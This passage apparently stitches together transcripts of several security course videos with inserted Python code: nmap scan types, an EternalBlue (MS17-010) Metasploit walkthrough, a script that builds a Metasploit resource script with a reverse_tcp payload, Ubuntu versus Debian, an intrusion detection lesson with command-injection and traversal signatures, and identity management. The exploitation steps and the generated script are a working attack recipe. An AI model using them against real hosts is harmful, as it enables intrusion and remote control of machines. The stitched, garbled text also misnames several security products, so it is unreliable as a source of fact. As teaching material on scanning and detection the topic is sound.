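2023-05-01T10:05:00 192.168.72.1:443 > 192.168.72.20:60000 SA
2023-05-01T10:05:00 192.168.72.20:60000 > 192.168.72.1:443 A
"""

LINE_RE = re.compile(r"^(\S+) (\S+):(\d+) > (\S+):(\d+) ([SAFR]+)$")


def parse_line(line):
    """Parse one summary line into a dict; return None for unparsable lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, src, sport, dst, dport, flags = m.groups()
    return {"ts": datetime.fromisoformat(ts), "src": src, "sport": int(sport),
            "dst": dst, "dport": int(dport), "flags": set(flags)}


def classify_sources(log_text, window=timedelta(seconds=60), min_ports=4):
    """Per source IP: peak distinct ports probed inside `window`, handshakes
    completed (ACK after SYN/ACK), handshakes aborted with RST, and a verdict."""
    convs = {}  # (src, sport, dst, dport) -> state of that connection attempt
    for line in log_text.splitlines():
        pkt = parse_line(line)
        if pkt is None:
            continue
        f = pkt["flags"]
        fwd = (pkt["src"], pkt["sport"], pkt["dst"], pkt["dport"])
        rev = (pkt["dst"], pkt["dport"], pkt["src"], pkt["sport"])
        if f == {"S"}:                                   # initiator's SYN
            convs[fwd] = {"ts": pkt["ts"], "synack": False, "ack": False, "rst": False}
        elif rev in convs and f == {"S", "A"}:           # target: port is open
            convs[rev]["synack"] = True
        elif fwd in convs and "A" in f and "R" not in f:  # handshake completed
            convs[fwd]["ack"] = True
        elif fwd in convs and "R" in f:                  # initiator tore it down
            convs[fwd]["rst"] = True
    per_src = defaultdict(list)
    for (src, _sport, _dst, dport), st in convs.items():
        per_src[src].append((st["ts"], dport, st))
    report = {}
    for src, attempts in per_src.items():
        attempts.sort(key=lambda a: a[0])
        peak = 0  # most distinct ports this source touched in any sliding window
        for i, (t0, _p, _s) in enumerate(attempts):
            ports = {p for t, p, _ in attempts[i:] if t - t0 <= window}
            peak = max(peak, len(ports))
        completed = sum(1 for _, _, s in attempts if s["synack"] and s["ack"])
        half_open = sum(1 for _, _, s in attempts
                        if s["synack"] and s["rst"] and not s["ack"])
        if peak < min_ports:
            verdict = "normal"
        elif half_open > completed:
            verdict = "syn_scan"
        else:
            verdict = "connect_scan"
        report[src] = {"ports": peak, "completed": completed,
                       "half_open": half_open, "verdict": verdict}
    return report


if __name__ == "__main__":
    for src, info in classify_sources(SAMPLE_LOG).items():
        print(src, info)
```

The half-open pattern (SYN, SYN/ACK, RST) is the fingerprint of an -sS scan; a sensor that only logs completed connections, which is what the narrator means by "the scan is not shown in most of the scan logs", never sees it, so detection has to work at the packet or flow level.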
This acts as a range: everything else stays the same, and nmap checks every port from 100 to 2000. Whatever ports are open within that range are listed here. Let's clear the screen.

Another flag that can be used with nmap is -sS. This runs a SYN scan, usually called a stealth scan, which is a little harder to notice if you are the IT admin of the system being scanned. The results are more or less the same, although this scan needs root privileges. As you can see, the output is similar to the plain port scan; it just adds the MAC address for good measure. But like I said, the point is the stealth. A normal connect scan completes the TCP handshake, so it is easier to spot when the logs are checked; a SYN scan never completes the handshake, which makes it tougher to catch on more intricate systems. It takes longer as well.

Now that we are done with both scans, let's look at a vulnerable machine. The system we scanned so far is my own personal system, which is locked down as much as it can be. There is an attack box running in the cloud, and its IP address is shown here. To reach that network we need to connect to its private network over a VPN, so I'm going to switch to a different workspace and open a terminal. As you can see, there is a hacktest.ovpn file here; I'm going to connect to their VPN using this file, and once we get the "Initialization Sequence Completed" message we know the connection has been established. As we discussed, this is the vulnerable device's IP. I'm going to copy it, open a new terminal and ping it to check whether we can reach the machine. We get a reply back, which means we are now on the same local network as the vulnerable machine.

Let's run a service scan (nmap -sV) so that nmap reports the version of each service it finds. We ran the same scan against my local machine, where we were able to detect what version each service was running. What we are going to do here is check what kind of services are exposed by the machine in the cloud, decide from that what to do next, and see whether nmap alone can point us in a direction where we can gain access. The scan is now complete, and we have the open ports and the service each one is running. As we discussed, this is the first, or sometimes the second, stage of ethical hacking: from here we infer which services are running.

Ports 139 and 445 are the Windows SMB ports (Samba is the implementation of the same protocol on Unix-like systems). Every service has a default port attached to it that stays consistent from machine to machine: an Apache web server listens on port 80 by default, and SMB servers use these two ports. SMB servers have had a well-known vulnerability, MS17-010, targeted by the EternalBlue exploit. From the scan results alone we cannot tell whether this machine is affected, but since SMB is exposed it is worth trying the exploit.

To start, I'm going to open another terminal and use Metasploit. We type sudo msfconsole; msfconsole is the command that launches the Metasploit console. Enter the root password and wait for Metasploit to launch. Note that, besides the ports, nmap also reported the host name and the operating system of the target. Now that Metasploit is open, before launching anything we check which exploits exist for the EternalBlue vulnerability: we run search eternalblue and look at the results. As you can see, entry 9 is exploit/windows/smb/ms17_010_eternalblue, described as MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption, first disclosed in 2017. That is the one we are going to use.

All of this may be confusing if you are not familiar with Metasploit, but remember this is the next stage of ethical hacking, the part where we gain access. We select exploit number 9 with the use command and set a payload, which is the malicious code that will run on the victim machine. Then we check the options. It already points to port 445 by default, since that is where the SMB server is reached. The parameter that is missing is RHOSTS, the IP address of the vulnerable machine, basically the machine we want to attack. I'm going to use the set command to set that IP address; if we check the options again, the victim IP is now set. Another parameter we can change is LHOST, the IP address of our own system to which the shell will connect back. Remember that we connected over a VPN, so we were assigned a new IP on that network: if we run ifconfig, the tun0 interface is the VPN adapter, and the address on it is the one we have been assigned in the network where the vulnerable machine lives. I'm going to copy that address, move back to this workspace and set LHOST to it. With that, our options are set.

Now we run exploit. It first checks whether the SMB vulnerability is present, and as you can see it reports that the target is vulnerable to this particular exploit. It then sends the malicious code, which is the payload we set above, and we now have a command shell on the Windows machine: the prompt shows C:\Windows\system32.
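The decision the video makes by hand, that 139/445 with a Windows SMB banner make MS17-010 worth a try, can be automated from the nmap output. The following is an added example, not code from the video: it parses nmap's grepable (-oG) output, applies the version-gating rule the narrator describes, and writes the msfconsole steps as a resource script. The scan text is constructed, not a real scan, and the 10.10.10.0/24 and 10.8.0.2 addresses are placeholders.

```python
"""Turn nmap -sV output into an exploit decision and a Metasploit resource script.

Added example (not code from the video). The scan text below is constructed,
not a real scan; the 10.10.10.0/24 targets and the 10.8.0.2 VPN address are
placeholders.
"""
from __future__ import annotations

from dataclasses import dataclass

# Constructed nmap -oG (grepable) output for two hosts. Each port entry is
# port/state/protocol/owner/service/rpcinfo/version.
SAMPLE_GNMAP = (
    "# Nmap 7.93 scan initiated as: nmap -sV -oG scan.gnmap 10.10.10.0/24\n"
    "Host: 10.10.10.5 ()\tStatus: Up\n"
    "Host: 10.10.10.5 ()\tPorts: 135/open/tcp//msrpc///, "
    "139/open/tcp//netbios-ssn///, "
    "445/open/tcp//microsoft-ds//Windows 7 Professional 7601 Service Pack 1 "
    "microsoft-ds (workgroup: WORKGROUP)/\tIgnored State: closed (997)\n"
    "Host: 10.10.10.7 ()\tStatus: Up\n"
    "Host: 10.10.10.7 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.2p1 Ubuntu 4ubuntu0.5/, "
    "445/open/tcp//netbios-ssn//Samba smbd 4.6.2/\tIgnored State: closed (998)\n"
)


@dataclass(frozen=True)
class Service:
    host: str
    port: int
    proto: str
    name: str      # nmap's service name, e.g. microsoft-ds
    version: str   # the -sV banner, empty if nmap could not identify it


def parse_gnmap(text: str) -> list[Service]:
    """Extract open ports from the 'Host: ... Ports: ...' lines of -oG output."""
    services: list[Service] = []
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        # The Ports field ends at the next tab-separated field (Ignored State).
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for entry in ports_field.split(","):
            fields = entry.strip().split("/")
            if len(fields) < 7 or fields[1] != "open":
                continue
            services.append(Service(host, int(fields[0]), fields[2], fields[4], fields[6]))
    return services


def eternalblue_candidates(services: list[Service]) -> list[str]:
    """Hosts where SMB on 445/tcp identifies itself as Windows.

    MS17-010 is a Windows SMBv1 bug; Samba answers on the same port but is
    not affected, so the -sV version string is what decides, which is the
    narrator's 'particular versions have particular exploits' point.
    """
    return sorted({
        s.host for s in services
        if s.port == 445 and s.proto == "tcp" and "windows" in s.version.lower()
    })


def resource_script(rhosts: list[str], lhost: str) -> str:
    """The msfconsole commands from the video as a resource (.rc) file.

    'check' is used instead of 'exploit' so the module only tests for the
    vulnerability; change it to 'exploit' once you are authorised to do so.
    """
    lines = [
        "use exploit/windows/smb/ms17_010_eternalblue",
        f"set RHOSTS {' '.join(rhosts)}",
        f"set LHOST {lhost}",  # our own address on the VPN interface (tun0)
        "set PAYLOAD windows/x64/meterpreter/reverse_tcp",
        "check",
    ]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    found = parse_gnmap(SAMPLE_GNMAP)
    for s in found:
        print(f"{s.host}:{s.port}/{s.proto} {s.name} {s.version}")
    targets = eternalblue_candidates(found)
    print("MS17-010 candidates:", targets)
    print(resource_script(targets, "10.8.0.2"), end="")
```

Against a real target you would produce the input with nmap -sV -oG scan.gnmap and run the generated file with msfconsole -r candidates.rc; the Samba host is deliberately excluded to show that an open 445 alone is not enough.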
To be sure that this really is the Windows machine, we type ipconfig, which is a Windows-only shell command; as you can see, it shows the IP address that was assigned to the victim machine.

While a major part of this process was done in Metasploit, we would not have reached this stage had we not found that ports 139 and 445 were open, which pointed us at the EternalBlue exploit against Windows SMB. In the same way, all the scans we ran serve as a preface to the actual hacking stages of a campaign. The -sV flag was necessary because it tells us exactly which services are running and in which version. If, for example, an Apache server is running, particular versions have particular exploits, and those exploits will not work on other versions, so we have to check which version is running and apply the matching exploit. That can be done in Metasploit or with some other tool, but deciding which exploit to run and which vulnerability to target is where nmap helps.

With the world moving towards the next generation of computer hardware, the software side still has a lot left to be discovered. Because most laptops come with Windows pre-installed, many users have never experienced a Linux operating system, which is more resource-friendly than the mainstream operating systems. That can be attributed to the difficulty people used to face when installing a new operating system like Linux in the old days. A lot of those issues are fixed nowadays, thanks to big names like Debian and Ubuntu, which have been instrumental in making Linux-based operating systems as user-friendly as possible. But which of them is better for you? Let's take a look at the topics we cover as we answer that question. We start by learning about both operating systems from a layman's perspective and uncovering their basic offerings. Next we cover the unique features of Ubuntu and Debian and how they stack up against each other and other industry counterparts. Moving on, we look at some pointers before installing each of them and the respective download links. Finally, we compare the contrasting features of Ubuntu and Debian and infer the kind of users each OS caters to.

Let's start with Ubuntu and Debian in general. Ubuntu is a free, open-source Linux distribution. Beyond the desktop, it is widely used for cloud computing, with official support for OpenStack. Ubuntu is developed by Canonical together with the Ubuntu community and is freely available; Canonical Ltd is responsible for funding it. A new Ubuntu version is released every six months, with free support for nine months after each release, and a long-term support (LTS) release comes out every two years. The first release was in October 2004. You must have heard of Ubuntu: it is the most popular Linux distribution overall, not just on servers but also the most popular choice for Linux desktops. It is easy to use, offers a good experience and comes pre-installed with the essential tools to get a head start. Ubuntu managed to simplify the Linux experience years ago, and that is why it is still so popular even with several impressive distributions available right now; every new release is more polished and loaded with new features and improvements. Thanks to its huge user base, a number of software vendors have made their applications compatible with Ubuntu. While the catalogue may not be as extensive as Windows', the options are well curated. More importantly, the advantage of Linux-based operating systems is the ability to use free and open-source alternatives to major proprietary software; while lacking some polish and features, most alternatives are enough to get the job done for the majority of users. The never-ending community support also helps in troubleshooting should things go wrong at any point. The default desktop environment in current Ubuntu releases is GNOME. Unity, Canonical's own desktop, was the default from Ubuntu 11.04 to 17.04; it is a modern desktop environment with a powerful search tool for finding all your applications and documents, and with GNOME components underneath it integrates well with common applications such as audio players, video players and social media. There are a few other desktop environments available for Ubuntu as well, and Unity is still available as the Ubuntu Unity flavour.

Debian, on the other hand, is a free operating system for your computer, started in 1993 and maintained by contributors around the globe. An operating system is the set of basic programs and utilities that make your computer run; its core is the kernel, the most fundamental program on the computer. Debian uses the Linux kernel, a completely free piece of software started by Linus Torvalds and supported by thousands of programmers worldwide. A large part of the basic tools that fill out the operating system come from the GNU project, and those tools are free as well. Debian is often called the mother of Linux distributions. Beginners always wonder why this not-so-good-looking distro is so popular within the Linux developer community, especially when there are plenty of modern distributions that are easy to use and have a beautiful UI; later, after using a bunch of distributions from other developers, they discover the power of Debian. You will be surprised to know that many of the most popular consumer-level distros, Ubuntu included, are based on Debian: it is so stable and feature-rich that developers find it easier to build their distros on Debian than from scratch. Debian is run and maintained by developers worldwide on the project's own infrastructure (its Salsa GitLab instance and the Debian Bug Tracking System), and major decisions are taken on the project's mailing lists and by general resolution of the developers, giving community-wide feedback and a holistic approach to the open-source development of the Debian operating system. Thanks to this variety of contributors, the source code of Debian comprises around 70 different programming and scripting languages. Debian supports all kinds of graphical environments, ranging from full-featured desktop environments to lighter alternatives and even minimalist window managers. Ubuntu ships with GNOME by default, the package manager can install other environments, and there are flavours built around Cinnamon, LXQt, Xfce, KDE Plasma, MATE and Unity; Debian instead lets you choose your desktop environment from the get-go by providing a separate ISO image for each desktop environment.

Now that we understand where both operating systems stand, let's look at some of the best features offered by each distribution. Ubuntu is the closest thing to a household name among desktop Linux distributions. It is a great distribution to start with, and even a great one to keep using after you are more experienced if you are happy with it. It is user-friendly in a lot of ways: it provides a simple desktop, an easy installer, and a checkbox during installation that automatically installs the third-party drivers and the codecs you will need for multimedia support. There is an Additional Drivers tool that detects closed-source or proprietary drivers that might be necessary to get all your hardware working and installs them for you. Ubuntu is produced by Canonical and its partners and run as an open project so that others with diverse ideas can benefit from all the work the developers do to deliver the world's best open platform. Still, Canonical is responsible for delivering six-monthly milestone releases and regular LTS releases for enterprise production use. Enterprises can count on Canonical to support, secure and manage Ubuntu infrastructure and devices; with more than 500 employees in over 39 countries, the company underpins critical infrastructure for thousands of businesses and millions of Ubuntu users around the world.

The Unity desktop was originally developed by Canonical and introduced for netbook computers with Ubuntu 10.10; it then went on to be the default desktop environment for Ubuntu. Eventually it was dropped by Canonical and replaced by GNOME, but it has since made a comeback as a community-maintained Ubuntu flavour and is completely stable. The HUD and the global menu hold up just fine with major applications such as LibreOffice, Thunderbird and the web browsers, which means the Unity desktop works as it is supposed to while making you more productive. Some desktop environments have a steep learning curve, but Unity is very intuitive for new users in spite of deviating from the traditional start-menu format that Windows users are accustomed to. The Calamares installer, used by some Ubuntu flavours such as Lubuntu, is a framework: by design it is very customisable in order to satisfy a wide variety of needs and use cases. Calamares aims to be easy, usable, beautiful, pragmatic and, most importantly, distribution-agnostic. It includes an advanced partitioning feature that supports both manual and automated partitioning operations, and it was the first installer with an automated replace-partition option, which makes it easy to reuse a partition over and over for distribution testing.

Coming to Debian, it is a community distribution through and through. It is governed by a board of elected developers, has its own internal structure and rules, and just about everyone working on it is a volunteer, making it completely community-driven. It is maintained and developed by programmers around the world, and this form of development ensures continuity: if one developer decides to stop working on the project, another can come in, take their place and keep the project going. It is completely free of centralised control, which is also one of the reasons for its undetermined stable release cycle. Debian Sid is the permanently unstable development version of Debian; it is where the latest versions of programs being considered for inclusion in the Debian release cycle are uploaded and tested. Because it has no official installation media, and the few netboot images that are built often do not work, even people willing to risk a development version may have trouble installing it. It still remains the best place to test new features that have not yet made their way into the stable branch. Debian's main repository contains only free and open-source software. This is ample for most users, except those whose hardware only has proprietary drivers; it is possible to add other repositories (contrib and non-free) that carry proprietary software if that is required, and since Debian 12 the official installer images include the non-free firmware that common hardware needs. The Debian stable release is very stable, because the software and libraries in it go through rigorous testing. That stability makes Debian a perfect server OS, and it is also the reason average users shy away from Debian as their primary desktop OS, since its packages lag behind the newest versions. It is also one of the reasons many developers use Debian as the base for their derivatives, one of which is Ubuntu.

Now that we are aware of each distribution's unique features, let's look at how to install these operating systems and where to get the installation images. Ubuntu has dropped support for 32-bit x86 systems; it currently supports only 64-bit x86 and ARM devices. Installation is easy with the installer that comes on the ISO by default, and the latest ISO can be downloaded from the link shown on screen. In the case of Debian, support for a wide range of devices is still present, including 32-bit systems and other smaller devices that are not modern. It does not use the Calamares installer, and even downloading the ISO can be a bit hectic for newer users: since this is a distribution aimed at developers and intermediate users, finding the right link can be difficult, which is why we have put the link on screen where you can get the latest ISO for the desktop environment you choose.

With installation out of the way, let's take a direct comparison of the features of Ubuntu and Debian. Debian is a community-driven open-source Linux distribution that aims above all to be robust, capable and free. Ubuntu is also free and open source like Debian, but it is backed and developed by Canonical, which is a corporation. Both are fundamentally fast. Since Debian comes bare-minimum and is not bundled with additional software and features, it is lighter and faster, at least when compared with Ubuntu directly. Both use the same APT package management system but provide different software repositories. Debian promotes the freedom to choose free software and so does not include any proprietary software by default; you can still install proprietary packages, but you have to enable them manually. Ubuntu focuses on usability and includes all kinds of software, free or paid, open source or closed source. Ubuntu also introduced a universal package format called Snap, meant to be used across distros and thus reduce distribution-based software fragmentation. Because the Debian distribution does not contain proprietary blobs by default, there can be problems with drivers and firmware: Debian lacks some essential proprietary firmware out of the box, but users can enable the repository and install it manually, just like other proprietary software. Ubuntu, on the other hand, does not care whether something is paid or free, open or closed source, so it includes as many drivers and as much firmware as possible, and it lets you install and configure the necessary drivers and firmware automatically during installation or afterwards. If you are a gamer, you will probably be concerned with the latest software, drivers and hardware support. While Debian can potentially provide that, you are likely to end up breaking your installation. As mentioned before, Ubuntu supports certain proprietary packages, which often include the graphics drivers essential to gaming, whereas Debian focuses on the open-source aspect of the software; it is a well-known fact among gamers that Ubuntu and some other distributions like Pop!_OS work much better in terms of both software and hardware support.

Regarding the audience they cater to, both Ubuntu and Debian have their pros and cons. Ubuntu is a very good distribution for amateur users with little to no experience, and for anyone who wants the latest versions of packages and applications at all times. It is also for users who do not want a lot of customisation, in spite of Unity being a very customisable desktop environment, and it is perfect for users with newer hardware since it ships with the latest graphics devices and their respective drivers. Debian, on the other hand, caters to slightly more experienced users who can fix minor bugs on their own or with minimal community support. It is also for users who want to support an open-source approach rather than an operating system that is primarily backed by a corporation and takes no contributions from outside. It does not favour gaming, since it does not guarantee compatibility with all the newest graphics cards, or even Wi-Fi cards in some cases. However, due to its low memory overhead, Debian is very useful for people who want to run home servers, or even corporate environments, where running servers on Debian will provide much more use.

Data protection is of paramount importance in today's world. The vast amount of data flowing between corporations and consumers needs to be secured, considering the trust that the organisations handling it are given. A company can spend millions of dollars on the most secure servers, but it takes a single hacker to ruin all the goodwill between organisations. To prevent these malicious attacks many automated security systems have been developed, but none has been used as widely as IDS platforms, also known as intrusion detection systems.

Welcome to this introductory lesson on intrusion detection systems. Let's go through the topics we cover today. We start with the basic definition of an IDS from a layman's perspective. Moving on, we cover the types of intruders that seek to access confidential information without authorisation. Next we cover the basic ways of detecting intrusion signatures from the perspective of a network administrator, and then take a look at the different types of IDS that can be used in corporate environments today. A short explanation of the two types of protection is then followed by an introduction to some of the best-known IDS tools on the market.

So let's get started with what an IDS is. An intrusion detection system is an application or device that continuously monitors inbound and outbound network traffic, analyses it for changes in activity and patterns, and alerts an administrator when it detects unusual behaviour; the administrator then reviews the alarms and takes action to remove the threat. For example, an IDS might inspect the data carried by network traffic to see whether it contains known malware or other malicious content. If it detects this type of threat, it sends an alert to your security team so they can investigate and remediate it; once the team receives the alert, they must act quickly to prevent the attack from taking over the system. To ensure that the IDS does not slow network performance down, these solutions often use a switched port analyser (SPAN) port or a test access point (TAP) to analyse a copy of the inline traffic, so that they do not meddle with the actual traffic. However, unlike an intrusion prevention system, an IDS does not block threats once they enter the network. Regardless of whether you set up a physical device or an IDS program, the system can recognise attack patterns in network packets, monitor user behaviour, identify abnormal network activity, and ensure that user and system activity do not go against security policies. The main goal of an IDS is to detect the anomalies before the hackers complete their objective; once the system detects a threat, the IT team is informed and the information is passed on. Given the requirement for understanding context, an enterprise has to be ready to make any IDS fit its own unique needs. What this means is that an IDS cannot be a one-size-fits-all configuration; to operate accurately and effectively it requires a savvy analyst to tailor the IDS to the interests and needs of a given site, and knowledgeable, trained system analysts to run it. The trick with an IDS is that you have to know what the attack is to be able to identify it; as the saying goes, the IDS has always had the patient-zero problem: you have to have found someone who got sick and died before you can identify the disease.

An IDS usually offers one of two types of protection, passive or active. In a passive system, the IDS detects a potential security breach, logs the information and raises an alert. In a reactive, or active, system, the IDS responds to the suspicious activity itself, for example by logging off a user or by reprogramming the firewall to block network traffic from the suspected malicious source.

Now that we understand what an IDS is, let's go through the different types of intruders IDS platforms must be aware of. To understand them, consider a scenario in which our servers are protected by an IDS platform. Say a hacker tries to breach the system from outside the organisation, which can be done using attacks such as DDoS or injection attacks. The category of individuals who are not authorised to use the system but still exploit users' privacy and confidential information using different techniques are known as masqueraders: a masquerader is an outsider who has no direct access to the system and aims to attack it unethically by stealing data or information. There is, however, another intruder who is theoretically harder to detect and uproot than a masquerader: people within the organisation who want to weaken the security defences, whether for corporate espionage or to aid masqueraders. Individuals who are authorised to use a system but misuse the granted access and privileges, taking undue advantage of the permissions given to them, are known as misfeasors. Misfeasors are insiders with direct access to the system which they aim to attack unethically by stealing data or information.

Let's now go through some of the ways IDS platforms can detect an intrusion before it is too late. Intrusion detection systems primarily use two key methods: signature-based detection and anomaly-based detection. Signature-based intrusion detection is designed to detect possible threats by comparing the given network traffic and log data to existing attack patterns. These patterns are called signatures and can include byte sequences in network traffic or known malicious instruction sequences used by malware. Signature-based detection enables you to accurately detect and identify known attacks. Anomaly-based intrusion detection is the opposite: it is designed to pinpoint unknown attacks, such as new malware, and adapt to them on the fly using machine learning. Machine-learning techniques enable the IDS to create baselines of trustworthy activity, known as a trust model, and then compare new behaviour against those verified baselines. False alarms can occur with an anomaly-based IDS, since previously unseen yet legitimate network traffic can be falsely identified as malicious activity. Combine the two and you have hybrid intrusion detection, which uses both signature-based and anomaly-based detection to increase the scope of your IDS and identify as many threats as possible. A comprehensive IDS also understands the evasion techniques cyber criminals use to trick an IDS into thinking no attack is taking place; these include fragmentation, low-bandwidth attacks, pattern-change evasion and many more.

Let's now look at the types of deployment offered by IDS platforms; there are a few ways they can be set up, so let's go through each. The first is a network-based IDS (NIDS). Sensors are deployed at strategic points within the network, such as in the DMZ or at the network perimeter. A sensor monitors the individual packets of inbound and outbound traffic to and from all devices on the network and analyses them for malicious activity; depending on the network architecture and the amount of traffic involved, multiple NIDS instances may be necessary. The second category is host-based intrusion detection (HIDS). An agent runs on all servers, endpoints and devices in the network that have access to both the internet and the internal network. Intrusions are identified by analysing operating-system-specific activity, such as modification of the file system, the registry or access control lists, and by monitoring system and application logs. HIDS augment network-based systems by detecting anomalous activity that originates within the organisation, or from the host being monitored: for example, a host infected with malware that is attempting to spread to other internal hosts is something a network-based IDS could potentially fail to detect. The third variant is a cloud-based IDS. Because of the internet-facing nature of the cloud, on-premises IDS solutions are not necessarily optimised for monitoring it.
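The signature-based and anomaly-based methods described above, and the false-alarm and pattern-change evasion caveats that go with them, are easiest to see on actual input. The following is an added example, not code from the video or from any IDS product: a small hybrid detector run over constructed web-server log lines. The log format, the signature list, the client addresses and the traffic are all constructed for the example.

```python
"""Hybrid intrusion detection over constructed web-server log lines.

Added example, not from the video or any product. Signatures are matched
after URL-decoding, so a simple pattern-change evasion (encoding the payload)
does not slip past; anomalies are scored against a per-client baseline learned
from a trusted window of traffic. Every log line is constructed, in the form
'<ip> [<minute>] "<method> <path> HTTP/1.1" <status>'.
"""
from __future__ import annotations

import re
import statistics
from collections import Counter
from urllib.parse import unquote

# A tiny signature database; production rule sets contain thousands of entries.
SIGNATURES = {
    "sqli-tautology": re.compile(r"'\s*or\s+1\s*=\s*1", re.IGNORECASE),
    "path-traversal": re.compile(r"(\.\./){2,}"),
    "cmd-injection": re.compile(r";\s*(cat|wget|curl)\s", re.IGNORECASE),
}

LOG_RE = re.compile(r'^(?P<ip>\S+) \[(?P<minute>\d+)\] "(?P<method>\w+) (?P<path>\S+)')


def normalise(path: str) -> str:
    """Decode twice: %2527 -> %27 -> ' so double-encoded payloads are caught too."""
    return unquote(unquote(path))


def signature_alerts(lines: list[str]) -> list[tuple[str, str]]:
    """Return (ip, signature name) for every line matching a known pattern."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = normalise(m["path"])
        for name, pattern in SIGNATURES.items():
            if pattern.search(path):
                alerts.append((m["ip"], name))
    return alerts


def requests_per_minute(lines: list[str]) -> Counter:
    """Count requests per (ip, minute) pair."""
    counts: Counter = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            counts[(m["ip"], m["minute"])] += 1
    return counts


def build_baseline(training: list[str]) -> tuple[float, float]:
    """The 'trust model': mean and standard deviation of per-client request rates."""
    rates = list(requests_per_minute(training).values())
    return statistics.mean(rates), statistics.pstdev(rates)


def anomaly_alerts(lines: list[str], baseline: tuple[float, float], k: float = 3.0):
    """Flag (ip, minute, count) where the rate exceeds mean + k standard deviations."""
    mean, sd = baseline
    threshold = mean + k * sd
    return [(ip, minute, n) for (ip, minute), n in requests_per_minute(lines).items() if n > threshold]


def hybrid_report(training: list[str], window: list[str]) -> dict:
    """Run both detectors on the same window, as a hybrid IDS would."""
    return {
        "signature": signature_alerts(window),
        "anomaly": anomaly_alerts(window, build_baseline(training)),
    }


# Constructed trusted traffic: five clients, ten minutes, 2 to 5 requests per minute.
TRAINING = [
    f'10.0.0.{c} [{m}] "GET /page{r} HTTP/1.1" 200'
    for c in range(1, 6) for m in range(1, 11) for r in range((c + m) % 4 + 2)
]

# Constructed window under inspection.
WINDOW = (
    ['10.0.0.2 [11] "GET /page1 HTTP/1.1" 200'] * 4                          # normal client
    + [f'203.0.113.9 [11] "POST /login?user=admin&pass={i} HTTP/1.1" 401'    # password-guessing burst
       for i in range(30)]
    + ['198.51.100.4 [11] "GET /search?q=%27%20OR%201%3D1-- HTTP/1.1" 200']  # URL-encoded SQL injection
    + ['198.51.100.4 [11] "GET /static/..%2F..%2F..%2Fetc/passwd HTTP/1.1" 404']
    + ['10.0.0.5 [11] "GET /sale HTTP/1.1" 200'] * 8                         # legitimate flash crowd
)

if __name__ == "__main__":
    report = hybrid_report(TRAINING, WINDOW)
    print("signature alerts:", report["signature"])
    print("anomaly alerts:", report["anomaly"])
```

The brute-force burst is only caught by the anomaly detector, since no signature describes it; the encoded injection and traversal are only caught by the signatures, since two requests are well within the baseline. The flash-crowd client is the false alarm the text warns about: legitimate but unusual, so it trips the rate threshold, and an analyst has to tune k or whitelist it.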
for example network based sensors need to be deployed within the cloud at an environment's Network perimeter and get a cloud service provider may or may not have a way to facilitate this cloud-based servers use purpose-built cloud sensors that use cloud service provider application programming interface or cloud service provider apis to get as much visibility as possible into your Cloud environment now that we understand the different types of IDs deployment tactics let us go through some tools that excel in this field offering top of the line implementations in a corporate and consumer environment the first tool being covered is the solar wind security event manager the Solomon security event manager is designed to integrate real-time log data from across your infrastructure enabling it to act both as a network-based idea system and a host based idea system the solution can let you discover all kinds of malicious attacks and help you protect your network from home it is also designed to enact both signature based and anomaly-based intuition detection by comparing sequences of network traffic against a set of customizable rules next we have the McAfee livesafe McAfee livesafe is an intrusion detection system designed to bring a real-time threat awareness to your physical and virtual Networks it uses signature based intuition prevention and anomaly-based inclusion detection along with emulation techniques to spot and identify malicious activity McAfee is also built to correlate threat activity with application usage which can further prevent network issues stemming from cyber attacks next we have lumira Romero is a security information and event management platform built to enact trade detection and responses across your cloud and on-premises environments it is designed to continuously monitor your I.T infrastructure for suspicious activity and misconfigurations both of which could result in data leaks and compliance breaches it enables you to respond to an attack 
in progress and stop malicious actors in their tracks monitoring usage of corporate data and access to privileged information had been a daunting task before the Advent of IAM encompassing numerous apis single sign-on Frameworks and data handling policies IEM has established itself as a key component of every it Department but how does it enforce these rules and what are the key benefactors of these policies what about the advantages of these Frameworks and the workflow of these systems we are here today to answer these questions let's take a look at some of the topics to be covered today we start by learning about IAM that is identity and access management from a surface level so as to put a clear idea of what it is next we cover the general workflow and process of how IAM works moving on we cover some of the tools that find the place in an IAM framework and are crucial components finally we go through some of the advantages of the IAM learning what makes them a lucrative deal for organizations so let's get started by learning about IAM from a surface level perspective identity and access management or IAM is a set of processes policies and tools for defining and managing the roles and accessibility of individual Network entities to a variety of cloud and on-premise applications the users can include customers Partners employees devices like computers smartphones routers Etc the core objective of IIM systems is one digital identity per individual or item once a digital identity has been established it must be maintained modified and monitored throughout each users or devices access lifecycle access and user are two vital IAM Concepts access refers to the actions permitted to be done by a user like view create or change a file users could be employees Partners suppliers contractors or even customers furthermore employees can be further segmented based on their roles IEM systems are designed to perform three key tasks identify authenticate and authorize meaning that 
Only the right person should have access to computers, hardware, software, apps and any other IT resources. With the entry of new users or the changing of the roles of existing users, the list of access privileges must be kept up to date all the time. IAM functions usually fall under IT departments or sections that handle cyber security and data management.

Now that we understand the importance of IAM in today's cyber security sphere, let us understand the process of this framework. You have multiple components that aid this process; let's start by going through each of them individually.

A principal is an entity that can perform actions on an AWS resource or any cloud management system. A user, a role or an application can be a principal. It's always the principal who raises a request to access or modify data on servers, serving as the first point of contact in the IAM workflow.

Authentication is the process of confirming the identity of the principal trying to access the product. The principal must provide its credentials or the required keys for authentication. This step can be further enhanced by multiple authentication factors and geolocation checks, among other things. Once the identity is confirmed, the principal has the ability to view the data behind the wall of security and take the necessary steps.

When it comes to requests, the principal then sends a request to the cloud management system specifying the action and which resource should perform it. In this step the user can ask to modify, delete, edit or affect other users in this particular part of the organization by changing the data or the information.

When it comes to authorization, it carries out the rest of an organization's identity and access management processes. Once the user has been authenticated, users are granted authorizations according to their role at the organization; this practice is referred to as role-based access control, or RBAC. Authorizations determine a role's resources and level of access in the network. These items may include systems, applications, file shares, printers and more. For example, an accounting department employee who regularly works with payroll software must be authorized to do so. If authentication resembles a passport, these are the things your digital identity can access with it. While authentication is fairly straightforward, authorizations and their management are far more challenging: authorizations consist of a complex set of rules, policies and groups, which are permitted or explicitly configured per user account.

With the working of IAM frameworks out of the way, let's cover some of the tools that these systems work on.

